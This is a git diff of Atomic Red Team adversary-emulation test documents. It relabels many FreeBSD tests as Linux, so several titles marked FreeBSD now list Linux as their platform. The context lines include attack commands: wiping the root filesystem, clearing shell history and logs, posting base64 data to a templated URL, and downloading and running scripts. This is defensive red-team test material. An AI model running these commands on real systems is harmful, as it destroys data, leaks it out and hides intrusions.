d0c88567-803d-4dca-99b4-7ce65e7b257c @@ -225,7 +225,7 @@ curl --create-dirs #{linenum_url} --output #{linenum} ## Atomic Test #5 - New script file in the tmp directory An attacker may create script files in the /tmp directory using the mktemp utility and execute them. The following commands creates a temp file and places a pointer to it in the variable $TMPFILE, echos the string id into it, and then executes the file using bash, which results in the id command being executed. -**Supported Platforms:** Freebsd, Linux +**Supported Platforms:** Linux **auto_generated_guid:** 8cd1947b-4a54-41fb-b5ea-07d0ace04f81 @@ -260,7 +260,7 @@ unset TMPFILE ## Atomic Test #6 - What shell is running An adversary will want to discover what shell is running so that they can tailor their attacks accordingly. The following commands will discover what shell is running. -**Supported Platforms:** Freebsd, Linux +**Supported Platforms:** Linux **auto_generated_guid:** 7b38e5cc-47be-44f0-a425-390305c76c17 @@ -290,7 +290,7 @@ if $(printenv SHELL >/dev/null); then printenv SHELL; fi ## Atomic Test #7 - What shells are available An adversary may want to discover which shell's are available so that they might switch to that shell to tailor their attacks to suit that shell. The following commands will discover what shells are available on the host. -**Supported Platforms:** Freebsd, Linux +**Supported Platforms:** Linux **auto_generated_guid:** bf23c7dc-1004-4949-8262-4c1d1ef87702 @@ -318,7 +318,7 @@ cat /etc/shells ## Atomic Test #8 - Command line scripts An adversary may type in elaborate multi-line shell commands into a terminal session because they can't or don't wish to create script files on the host. The following command is a simple loop, echoing out Atomic Red Team was here! -**Supported Platforms:** Freebsd, Linux +**Supported Platforms:** Linux **auto_generated_guid:** b04ed73c-7d43-4dc8-b563-a2fc595cba1a @@ -377,7 +377,7 @@ unset ART ## Atomic Test #10 - Obfuscated command line scripts (freebsd) An adversary may pre-compute the base64 representations of the terminal commands that they wish to execute in an attempt to avoid or frustrate detection. The following commands base64 encodes the text string id, then base64 decodes the string, then pipes it as a command to bash, which results in the id command being executed. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 5dc1d9dd-f396-4420-b985-32b1c4f79062 @@ -455,7 +455,7 @@ echo "Automated installer not implemented yet, please install chsh manually" ## Atomic Test #12 - Change login shell (freebsd) An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test, creates an art user with a /bin/sh shell, changes the users shell to sh, then deletes the art user. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 33b68b9b-4988-4caf-9600-31b7bf04227c @@ -535,7 +535,7 @@ unset ART ## Atomic Test #14 - Environment variable scripts (freebsd) An adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host. The following test, in a bash shell, exports the ART variable containing an echo command, then pipes the variable to /bin/sh -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 663b205d-2121-48a3-a6f9-8c9d4d87dfee @@ -622,7 +622,7 @@ apt update && apt install -y curl ## Atomic Test #16 - Detecting pipe-to-shell (freebsd) An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage of this BLIND install method and selectively running extra commands in the install script for those who DO pipe to bash and not for those who DO NOT. This test uses curl to download the pipe-to-shell.sh script, the first time without piping it to bash and the second piping it into bash which executes the echo command. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 1a06b1ec-0cca-49db-a222-3ebb6ef25632 diff --git a/atomics/T1059.006/T1059.006.md b/atomics/T1059.006/T1059.006.md index 16af50ffc2..49ab1de237 100644 --- a/atomics/T1059.006/T1059.006.md +++ b/atomics/T1059.006/T1059.006.md @@ -20,7 +20,7 @@ Python comes with many built-in packages to interact with the underlying system, ## Atomic Test #1 - Execute shell script via python's command mode arguement Download and execute shell script and write to file then execute locally using Python -c (command mode) -**Supported Platforms:** Freebsd, Linux +**Supported Platforms:** Linux **auto_generated_guid:** 3a95cdb2-c6ea-4761-b24e-02b71889b8bb @@ -74,7 +74,7 @@ pip install requests ## Atomic Test #2 - Execute Python via scripts Create Python file (.py) that downloads and executes shell script via executor arguments -**Supported Platforms:** Freebsd, Linux +**Supported Platforms:** Linux **auto_generated_guid:** 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8 @@ -139,7 +139,7 @@ pip install requests ## Atomic Test #3 - Execute Python via Python executables Create Python file (.py) then compile to binary (.pyc) that downloads an external malicious script then executes locally using the supplied executor and arguments -**Supported Platforms:** Freebsd, Linux +**Supported Platforms:** Linux **auto_generated_guid:** 0b44d79b-570a-4b27-a31f-3bf2156e5eaa @@ -206,7 +206,7 @@ pip install requests ## Atomic Test #4 - Python pty module and spawn function used to spawn sh or bash Uses the Python spawn function to spawn a sh shell followed by a bash shell. Per Volexity, this technique was observed in exploitation of Atlassian Confluence [CVE-2022-26134]. Reference: https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence -**Supported Platforms:** Freebsd, Linux +**Supported Platforms:** Linux **auto_generated_guid:** 161d694c-b543-4434-85c3-c3a433e33792 diff --git a/atomics/T1069.001/T1069.001.md b/atomics/T1069.001/T1069.001.md index 13b8e5d9fb..1ba4e51843 100644 --- a/atomics/T1069.001/T1069.001.md +++ b/atomics/T1069.001/T1069.001.md @@ -26,7 +26,7 @@ Commands such as net localgroup of the [Net](https://attack.mitre.o ## Atomic Test #1 - Permission Groups Discovery (Local) Permission Groups Discovery -**Supported Platforms:** Freebsd, macOS, Linux +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 952931a4-af0b-4335-bbbe-73c8c5b327ae diff --git a/atomics/T1070.002/T1070.002.md b/atomics/T1070.002/T1070.002.md index 53856c9db4..df68871308 100644 --- a/atomics/T1070.002/T1070.002.md +++ b/atomics/T1070.002/T1070.002.md @@ -107,7 +107,7 @@ if [ -d /var/audit ] ; then touch #{macos_audit_path} ; fi ## Atomic Test #2 - rm -rf Delete messages and security logs -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** bd8ccc45-d632-481e-b7cf-c467627d68f9 @@ -211,7 +211,7 @@ touch #{system_log_path} ## Atomic Test #5 - Truncate system log files via truncate utility (freebsd) This test truncates the system log files using the truncate utility with (-s 0 or --size=0) parameter which sets file size to zero, thus emptying the file content -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 14033063-ee04-4eaf-8f5d-ba07ca7a097c @@ -286,7 +286,7 @@ touch #{system_log_path} ## Atomic Test #7 - Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd) The first sub-test truncates the log file to zero bytes via /dev/null and the second sub-test fills the log file with null bytes(zeroes) via /dev/zero, using cat utility -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 369878c6-fb04-48d6-8fc2-da9d97b3e054 @@ -397,7 +397,7 @@ sudo echo '' > #{system_log_path} ## Atomic Test #10 - Overwrite FreeBSD system log via echo utility This test overwrites the contents of system log file with an empty string using echo utility -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 11cb8ee1-97fb-4960-8587-69b8388ee9d9 @@ -498,7 +498,7 @@ touch #{system_log_path} ## Atomic Test #13 - Delete system log files via unlink utility (freebsd) This test deletes the messages log file using unlink utility -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 45ad4abd-19bd-4c5f-a687-41f3eee8d8c2 diff --git a/atomics/T1070.003/T1070.003.md b/atomics/T1070.003/T1070.003.md index 53d506e9f0..2870812d32 100644 --- a/atomics/T1070.003/T1070.003.md +++ b/atomics/T1070.003/T1070.003.md @@ -88,7 +88,7 @@ rm ~/.bash_history ## Atomic Test #2 - Clear sh history (rm) Clears sh history via rm -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 448893f8-1d5d-4ae2-9017-7fcd73a7e100 @@ -144,7 +144,7 @@ echo "" > ~/.bash_history ## Atomic Test #4 - Clear sh history (echo) Clears sh history via echo -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** a4d63cb3-9ed9-4837-9480-5bf6b09a6c96 @@ -200,7 +200,7 @@ cat /dev/null > ~/.bash_history ## Atomic Test #6 - Clear sh history (cat dev/null) Clears sh history via cat /dev/null -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** ecaefd53-6fa4-4781-ba51-d9d6fb94dbdc @@ -256,7 +256,7 @@ ln -sf /dev/null ~/.bash_history ## Atomic Test #8 - Clear sh history (ln dev/null) Clears sh history via a symlink to /dev/null -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 3126aa7a-8768-456f-ae05-6ab2d4accfdd @@ -312,7 +312,7 @@ truncate -s0 ~/.bash_history ## Atomic Test #10 - Clear sh history (truncate) Clears sh history via truncate -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** e14d9bb0-c853-4503-aa89-739d5c0a5818 @@ -370,7 +370,7 @@ history -c ## Atomic Test #12 - Clear history of a bunch of shells (freebsd) Clears the history of a bunch of different shell types by setting the history size to zero -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 9bf7c8af-5e12-42ea-bf6b-b0348fb9dfb0 @@ -514,7 +514,7 @@ echo -e 'pwd101!\npwd101!' | passwd testuser1 ## Atomic Test #16 - Disable sh History Logging with SSH -T (freebsd) Keeps history clear and stays out of lastlog,wtmp,btmp ssh -T keeps the ssh client from catching a proper TTY, which is what usually gets logged on lastlog -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** ec3f2306-dd19-4c4b-bed7-92d20e9b1dee diff --git a/atomics/T1070.004/T1070.004.md b/atomics/T1070.004/T1070.004.md index 00c1b42b6f..87ea4a1f9e 100644 --- a/atomics/T1070.004/T1070.004.md +++ b/atomics/T1070.004/T1070.004.md @@ -34,7 +34,7 @@ There are tools available from the host operating system to perform cleanup, but ## Atomic Test #1 - Delete a single file - FreeBSD/Linux/macOS Delete a single file from the temporary directory -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 562d737f-2fc6-4b09-8c2a-7f8ff0828480 @@ -84,7 +84,7 @@ mkdir -p #{parent_folder} && touch #{file_to_delete} ## Atomic Test #2 - Delete an entire folder - FreeBSD/Linux/macOS Recursively delete the temporary directory and all files contained within it -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** a415f17e-ce8d-4ce2-a8b4-83b674e7017e @@ -372,7 +372,7 @@ rm -rf / --no-preserve-root > /dev/null 2> /dev/null ## Atomic Test #9 - Delete Filesystem - FreeBSD This test deletes the entire root filesystem of a FreeBSD system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** b5aaca7e-a48f-4f1b-8f0f-a27b8f516608 diff --git a/atomics/T1070.006/T1070.006.md b/atomics/T1070.006/T1070.006.md index 71c6b526ed..6205e0ecb1 100644 --- a/atomics/T1070.006/T1070.006.md +++ b/atomics/T1070.006/T1070.006.md @@ -28,7 +28,7 @@ Timestomping may be used along with file name [Masquerading](https://attack.mitr ## Atomic Test #1 - Set a file's access timestamp Stomps on the access timestamp of a file -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 5f9113d5-ed75-47ed-ba23-ea3573d05810 @@ -77,7 +77,7 @@ echo 'T1070.006 file access timestomp test' > #{target_filename} ## Atomic Test #2 - Set a file's modification timestamp Stomps on the modification timestamp of a file -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 20ef1523-8758-4898-b5a2-d026cc3d2c52 @@ -129,7 +129,7 @@ Stomps on the create timestamp of a file Setting the creation timestamp requires changing the system clock and reverting. Sudo or root privileges are required to change date. Use with caution. -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b @@ -172,7 +172,7 @@ Modifies the `modify` and `access` timestamps using the timestamps of a specifie This technique was used by the threat actor Rocke during the compromise of Linux web servers. -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 631ea661-d661-44b0-abdb-7a7f3fc08e50 diff --git a/atomics/T1071.001/T1071.001.md b/atomics/T1071.001/T1071.001.md index a8ea071d34..0782d04c9c 100644 --- a/atomics/T1071.001/T1071.001.md +++ b/atomics/T1071.001/T1071.001.md @@ -115,7 +115,7 @@ Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl.zip" This test simulates an infected host beaconing to command and control. Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 2d7c471a-e887-4b78-b0dc-b0df1f2e0658 diff --git a/atomics/T1074.001/T1074.001.md b/atomics/T1074.001/T1074.001.md index 2163e49e78..81abcf9b16 100644 --- a/atomics/T1074.001/T1074.001.md +++ b/atomics/T1074.001/T1074.001.md @@ -91,7 +91,7 @@ curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ato ## Atomic Test #3 - Stage data from Discovery.sh (freebsd) Utilize curl to download discovery.sh and execute a basic information gathering shell script -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 4fca7b49-379d-4493-8890-d6297750fa46 diff --git a/atomics/T1078.003/T1078.003.md b/atomics/T1078.003/T1078.003.md index ce3558504d..fefdeb4f06 100644 --- a/atomics/T1078.003/T1078.003.md +++ b/atomics/T1078.003/T1078.003.md @@ -310,7 +310,7 @@ userdel -r art ## Atomic Test #9 - Create local account (FreeBSD) An adversary may wish to create an account with admin privileges to work with. In this test we create a "art" user with the password art, switch to art, execute whoami, exit and delete the art user. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 95158cc9-8f6d-4889-9531-9be3f7f095e0 @@ -389,7 +389,7 @@ A system administrator may have locked and expired a user account rather than de In this test we create a "art" user with the password art, lock and expire the account, try to su to art and fail, unlock and renew the account, su successfully, then delete the account. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 09e3380a-fae5-4255-8b19-9950be0252cf @@ -469,7 +469,7 @@ cat /etc/passwd |grep nobody ## Atomic Test #13 - Login as nobody (freebsd) An adversary may try to re-purpose a system account to appear legitimate. In this test change the login shell of the nobody account, change its password to nobody, su to nobody, exit, then reset nobody's shell to /usr/sbin/nologin. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 16f6374f-7600-459a-9b16-6a88fd96d310 diff --git a/atomics/T1082/T1082.md b/atomics/T1082/T1082.md index 277ec91af8..40abc14cfa 100644 --- a/atomics/T1082/T1082.md +++ b/atomics/T1082/T1082.md @@ -134,7 +134,7 @@ ls -al /Applications ## Atomic Test #3 - List OS Information Identify System Info -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** cccb070c-df86-4216-a5bc-9fb60c74e27c @@ -244,7 +244,7 @@ sudo lsmod | grep -i "hv_vmbus\|hv_blkvsc\|hv_netvsc\|hv_utils\|hv_storvsc" ## Atomic Test #6 - FreeBSD VM Check via Kernel Modules Identify virtual machine host kernel modules. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** eefe6a49-d88b-41d8-8fc2-b46822da90d3 @@ -301,7 +301,7 @@ hostname ## Atomic Test #8 - Hostname Discovery Identify system hostname for FreeBSD, Linux and macOS systems. -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 486e88ea-4f56-470f-9b57-3f4d73f39133 @@ -433,7 +433,7 @@ set ## Atomic Test #12 - Environment variables discovery on freebsd, macos and linux Identify all environment variables. Upon execution, environments variables and your path info will be displayed. -**Supported Platforms:** Freebsd, macOS, Linux +**Supported Platforms:** Linux, macOS **auto_generated_guid:** fcbdd43f-f4ad-42d5-98f3-0218097e2720 @@ -904,7 +904,7 @@ grep vmw /proc/modules ## Atomic Test #26 - FreeBSD List Kernel Modules Enumerate kernel modules loaded. Upon successful execution stdout will display kernel modules loaded, followed by list of modules matching 'vmm' if present. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 4947897f-643a-4b75-b3f5-bed6885749f6 diff --git a/atomics/T1083/T1083.md b/atomics/T1083/T1083.md index c72492162d..f2624d2517 100644 --- a/atomics/T1083/T1083.md +++ b/atomics/T1083/T1083.md @@ -103,7 +103,7 @@ http://osxdaily.com/2013/01/29/list-all-files-subdirectory-contents-recursively/ https://perishablepress.com/list-files-folders-recursively-terminal/ -**Supported Platforms:** Freebsd, macOS, Linux +**Supported Platforms:** Linux, macOS **auto_generated_guid:** ffc8b249-372a-4b74-adcd-e4c0430842de @@ -147,7 +147,7 @@ rm #{output_file} ## Atomic Test #4 - Nix File and Directory Discovery 2 Find or discover files on the file system -**Supported Platforms:** Freebsd, macOS, Linux +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 13c5e1ae-605b-46c4-a79f-db28c77ff24e diff --git a/atomics/T1087.001/T1087.001.md b/atomics/T1087.001/T1087.001.md index ef9b2193f6..a274c99d06 100644 --- a/atomics/T1087.001/T1087.001.md +++ b/atomics/T1087.001/T1087.001.md @@ -34,7 +34,7 @@ Commands such as net user and net localgroup of the [N ## Atomic Test #1 - Enumerate all accounts (Local) Enumerate all accounts by copying /etc/passwd to another file -**Supported Platforms:** Freebsd, Linux +**Supported Platforms:** Linux **auto_generated_guid:** f8aab3dd-5990-4bf8-b8ab-2226c951696f @@ -72,7 +72,7 @@ rm -f #{output_file} ## Atomic Test #2 - View sudoers access (requires root) -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** fed9be70-0186-4bde-9f8a-20945f9370c2 @@ -111,7 +111,7 @@ rm -f #{output_file} ## Atomic Test #3 - View accounts with UID 0 View accounts with UID 0 -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** c955a599-3653-4fe5-b631-f11c00eb0397 @@ -150,7 +150,7 @@ rm -f #{output_file} 2>/dev/null ## Atomic Test #4 - List opened files by user List opened files by user -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 7e46c7a5-0142-45be-a858-1a3ecb4fd3cb @@ -240,7 +240,7 @@ sudo apt-get install login; exit 1; ## Atomic Test #6 - Show if a user account has ever logged in remotely (freebsd) Show if a user account has ever logged in remotely -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 0f73418f-d680-4383-8a24-87bc97fe4e35 @@ -278,7 +278,7 @@ rm -f #{output_file} ## Atomic Test #7 - Enumerate users and groups Utilize groups and id to enumerate users and groups -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** e6f36545-dc1e-47f0-9f48-7f730f54a02e diff --git a/atomics/T1090.001/T1090.001.md b/atomics/T1090.001/T1090.001.md index a8c6aceeec..419d0cc25b 100644 --- a/atomics/T1090.001/T1090.001.md +++ b/atomics/T1090.001/T1090.001.md @@ -20,7 +20,7 @@ Enable traffic redirection. Note that this test may conflict with pre-existing system configuration. -**Supported Platforms:** Freebsd, macOS, Linux +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 0ac21132-4485-4212-a681-349e8a6637cd diff --git a/atomics/T1090.003/T1090.003.md b/atomics/T1090.003/T1090.003.md index 683b588968..20ff12f682 100644 --- a/atomics/T1090.003/T1090.003.md +++ b/atomics/T1090.003/T1090.003.md @@ -237,7 +237,7 @@ brew install tor This test is designed to launch the tor proxy service, which is what is utilized in the background by the Tor Browser and other applications with add-ons in order to provide onion routing functionality. Upon successful execution, the tor proxy service will be launched. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 550ec67d-a99e-408b-816a-689271b27d2a diff --git a/atomics/T1098.004/T1098.004.md b/atomics/T1098.004/T1098.004.md index a5d75397b6..3e2781729d 100644 --- a/atomics/T1098.004/T1098.004.md +++ b/atomics/T1098.004/T1098.004.md @@ -19,7 +19,7 @@ SSH keys can also be added to accounts on network devices, such as with the `ip Modify contents of /.ssh/authorized_keys to maintain persistence on victim host. If the user is able to save the same contents in the authorized_keys file, it shows user can modify the file. -**Supported Platforms:** Freebsd, macOS, Linux +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 342cc723-127c-4d3a-8292-9c0c6b4ecadc diff --git a/atomics/T1105/T1105.md b/atomics/T1105/T1105.md index 5ca8c2b71f..2e4f11e933 100644 --- a/atomics/T1105/T1105.md +++ b/atomics/T1105/T1105.md @@ -72,7 +72,7 @@ On Windows, adversaries may use various utilities to download tools, such as `co ## Atomic Test #1 - rsync remote file copy (push) Utilize rsync to perform a remote file copy (push) -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 0fc6e977-cb12-44f6-b263-2824ba917409 @@ -120,7 +120,7 @@ if [ -x "$(command -v rsync)" ]; then exit 0; else exit 1; fi ## Atomic Test #2 - rsync remote file copy (pull) Utilize rsync to perform a remote file copy (pull) -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 3180f7d5-52c0-4493-9ea0-e3431a84773f @@ -168,7 +168,7 @@ if [ -x "$(command -v rsync)" ]; then exit 0; else exit 1; fi ## Atomic Test #3 - scp remote file copy (push) Utilize scp to perform a remote file copy (push) -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 83a49600-222b-4866-80a0-37736ad29344 @@ -204,7 +204,7 @@ scp #{local_file} #{username}@#{remote_host}:#{remote_path} ## Atomic Test #4 - scp remote file copy (pull) Utilize scp to perform a remote file copy (pull) -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** b9d22b9a-9778-4426-abf0-568ea64e9c33 @@ -240,7 +240,7 @@ scp #{username}@#{remote_host}:#{remote_file} #{local_path} ## Atomic Test #5 - sftp remote file copy (push) Utilize sftp to perform a remote file copy (push) -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** f564c297-7978-4aa9-b37a-d90477feea4e @@ -276,7 +276,7 @@ sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}' ## Atomic Test #6 - sftp remote file copy (pull) Utilize sftp to perform a remote file copy (pull) -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 0139dba1-f391-405e-a4f5-f3989f2c88ef @@ -597,7 +597,7 @@ Echo "A version of Windows Defender with MpCmdRun.exe must be installed manually ## Atomic Test #14 - whois file download Download a remote file using the whois utility -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** c99a829f-0bb8-4187-b2c6-d47d1df74cab diff --git a/atomics/T1110.001/T1110.001.md b/atomics/T1110.001/T1110.001.md index 5e5dd6d534..672281b661 100644 --- a/atomics/T1110.001/T1110.001.md +++ b/atomics/T1110.001/T1110.001.md @@ -379,7 +379,7 @@ An adversary may find themselves on a box (e.g. via ssh key auth, with no passwo This test creates the "art" user with a password of "password123", logs in, downloads and executes the sudo_bruteforce.sh which brute force guesses the password, then deletes the user -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** abcde488-e083-4ee7-bc85-a5684edd7541 diff --git a/atomics/T1110.004/T1110.004.md b/atomics/T1110.004/T1110.004.md index c7cd6d6d45..c086d847b6 100644 --- a/atomics/T1110.004/T1110.004.md +++ b/atomics/T1110.004/T1110.004.md @@ -130,7 +130,7 @@ brew install hudochenkov/sshpass/sshpass ## Atomic Test #3 - SSH Credential Stuffing From FreeBSD Using username,password combination from a password dump to login over SSH. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** a790d50e-7ebf-48de-8daa-d9367e0911d4 diff --git a/atomics/T1113/T1113.md b/atomics/T1113/T1113.md index 79c158b558..71a7d61321 100644 --- a/atomics/T1113/T1113.md +++ b/atomics/T1113/T1113.md @@ -153,7 +153,7 @@ sudo #{package_installer} ## Atomic Test #4 - X Windows Capture (freebsd) Use xwd command to collect a full desktop screenshot and review file with xwud -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 562f3bc2-74e8-46c5-95c7-0e01f9ccc65c @@ -253,7 +253,7 @@ sudo apt install graphicsmagick-imagemagick-compat ## Atomic Test #6 - Capture Linux Desktop using Import Tool (freebsd) Use import command from ImageMagick to collect a full desktop screenshot -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 18397d87-38aa-4443-a098-8a48a8ca5d8d diff --git a/atomics/T1124/T1124.md b/atomics/T1124/T1124.md index 2e66b5d2ff..89a1eb3f51 100644 --- a/atomics/T1124/T1124.md +++ b/atomics/T1124/T1124.md @@ -88,7 +88,7 @@ Get-Date ## Atomic Test #3 - System Time Discovery in FreeBSD/macOS Identify system time. Upon execution, the local computer system time and timezone will be displayed. -**Supported Platforms:** Freebsd, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** f449c933-0891-407f-821e-7916a21a1a6f diff --git a/atomics/T1132.001/T1132.001.md b/atomics/T1132.001/T1132.001.md index c27b313488..97f7a76372 100644 --- a/atomics/T1132.001/T1132.001.md +++ b/atomics/T1132.001/T1132.001.md @@ -51,7 +51,7 @@ curl -XPOST #{base64_data}.#{destination_url} ## Atomic Test #2 - Base64 Encoded data (freebsd) Utilizing a common technique for posting base64 encoded data. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 2d97c626-7652-449e-a986-b02d9051c298 diff --git a/atomics/T1135/T1135.md b/atomics/T1135/T1135.md index ce4123402c..af9745404d 100644 --- a/atomics/T1135/T1135.md +++ b/atomics/T1135/T1135.md @@ -113,7 +113,7 @@ sudo #{package_installer} ## Atomic Test #3 - Network Share Discovery - FreeBSD Network Share Discovery using smbstatus -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 77e468a6-3e5c-45a1-9948-c4b5603747cb diff --git a/atomics/T1136.001/T1136.001.md b/atomics/T1136.001/T1136.001.md index 091130ce39..6f0f01a11b 100644 --- a/atomics/T1136.001/T1136.001.md +++ b/atomics/T1136.001/T1136.001.md @@ -65,7 +65,7 @@ userdel #{username} ## Atomic Test #2 - Create a user account on a FreeBSD system Create a user via pw -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** a39ee1bc-b8c1-4331-8e5f-1859eb408518 @@ -261,7 +261,7 @@ userdel #{username} ## Atomic Test #7 - Create a new user in FreeBSD with `root` GID. Creates a new user in FreeBSD and adds the user to the `root` group. This technique was used by adversaries during the Butter attack campaign. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** d141afeb-d2bc-4934-8dd5-b7dba0f9f67a diff --git a/atomics/T1140/T1140.md b/atomics/T1140/T1140.md index 9607fe4162..dc5bb861ca 100644 --- a/atomics/T1140/T1140.md +++ b/atomics/T1140/T1140.md @@ -115,7 +115,7 @@ del %temp%\T1140_calc2_decoded.exe >nul 2>&1 ## Atomic Test #3 - Base64 decoding with Python Use Python to decode a base64-encoded text string and echo it to the console -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 356dc0e8-684f-4428-bb94-9313998ad608 @@ -167,7 +167,7 @@ echo "Please install Python 3" ## Atomic Test #4 - Base64 decoding with Perl Use Perl to decode a base64-encoded text string and echo it to the console -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 6604d964-b9f6-4d4b-8ce8-499829a14d0a @@ -258,7 +258,7 @@ bash -c "{echo,\"$(echo $ENCODED)\"}|{base64,-d}" ## Atomic Test #6 - Base64 decoding with shell utilities (freebsd) Use common shell utilities to decode a base64-encoded text string and echo it to the console -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** b6097712-c42e-4174-b8f2-4b1e1a5bbb3d @@ -299,7 +299,7 @@ echo $ENCODED > #{encoded_file} && cat < #{encoded_file} | b64decode -r ## Atomic Test #7 - FreeBSD b64encode Shebang in CLI Using b64decode shell scripts that have Shebang in them. This is commonly how attackers obfuscate passing and executing a shell script. Seen [here](https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html) by TrendMicro, as well as [LinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS). Also a there is a great Sigma rule [here](https://github.com/SigmaHQ/sigma/blob/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml) for it. -**Supported Platforms:** Freebsd +**Supported Platforms:** Linux **auto_generated_guid:** 18ee2002-66e8-4518-87c5-c0ec9c8299ac @@ -350,7 +350,7 @@ echo "please install b64decode" ## Atomic Test #8 - Hex decoding with shell utilities Use common shell utilities to decode a hex-encoded text string and echo it to the console -**Supported Platforms:** Freebsd, Linux, macOS +**Supported Platforms:** Linux, macOS **auto_generated_guid:** 005943f9-8dd5-4349-8b46-0313c0a9f973 diff --git a/atomics/T1176/T1176.md b/atomics/T1176/T1176.md index 709890a64d..285d29c85b 100644 --- a/atomics/T1176/T1176.md +++ b/atomics/T1176/T1176.md @@ -28,7 +28,7 @@ There have also been instances of botnets using a persistent backdoor through ma ## Atomic Test #1 - Chrome/Chromium (Developer Mode) Turn on 